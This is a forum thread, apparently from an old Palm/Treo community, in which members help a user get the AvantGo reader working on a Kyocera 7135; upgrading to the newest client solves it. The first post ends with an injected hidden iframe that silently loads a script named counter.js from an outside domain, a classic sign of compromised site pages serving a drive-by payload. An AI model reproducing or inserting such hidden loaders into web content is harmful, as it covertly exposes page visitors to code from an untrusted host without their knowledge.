+ Reply to Thread
Results 1 to 8 of 8
  1. #1
    Registered User
    Join Date
    01-05-2003
    Posts
    63

    avantgo version that works?

    My old Avantgo on the 6035 worked...but the same software no longer works on the 7135. I haven't found anything on the board from a search.

    Anyone have ideas of how to get Avantgo to work on the 7135?

    --Richard<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    01-24-2003
    Location
    Torrance, CA - USA
    Posts
    420
    Have you tried going to the AdvantGo site and downloading their newest client? (https://my.avantgo.com/account/downloads.html)

    After my 6035 took a dump and did a hard reset, I found I was out of date on quite a few of my Palm apps. So I went to each app site and got the latest version.

    Since I don't have a 7135 (yet), I can't verify that it will work, but maybe doing a hard reset and re-installing everything might work? Or maybe a hack could be interfering with AvantGo that worked on the 6035?

    Just some ideas...
    ~Ron

  3. #3
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    the latest version works on the i330 so i dont see why it would not work on the 7135...

  4. #4
    Registered User
    Join Date
    08-06-2001
    Posts
    37
    I have it on my 7135 It works fine.
    4.2 build 1165 If that helps
    No Honey it didn't cost that much really it didn't


  5. #5
    Registered User
    Join Date
    01-05-2003
    Posts
    63
    Got it working! Thanks much!

  6. #6
    Registered User
    Join Date
    07-09-2003
    Posts
    37
    My version is even older -- 3.3 build 403. I've been using it for over 2 years with no problems. All I did was beam 3 applications from my Visor Edge to my 7135 -- Avantgo, Mobile Link, libmal. I did it by trial-and-error. Afterwards, I manually copied over the server preferences settings from Edge to 7135. And it worked. I even got modem sync to work using qnc. So, no need to sync using the cradle. Takes about 3-4 minutes to do a wireless sync for all my channels. Great for reading ny times on sunday mornings.

  7. #7
    Registered User
    Join Date
    01-24-2003
    Location
    Torrance, CA - USA
    Posts
    420
    Originally posted by richard
    Got it working! Thanks much!
    Out of curiousity, and for the benefit of others , what fixed the problem?

  8. #8
    Registered User
    Join Date
    01-05-2003
    Posts
    63
    Yes, great point. Just upgraded the version to the latest. There is an OS5 beta but of course I didn't use that. My hesitation was really that I wanted to see if others had got it working before I tried that.

    Thanks!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts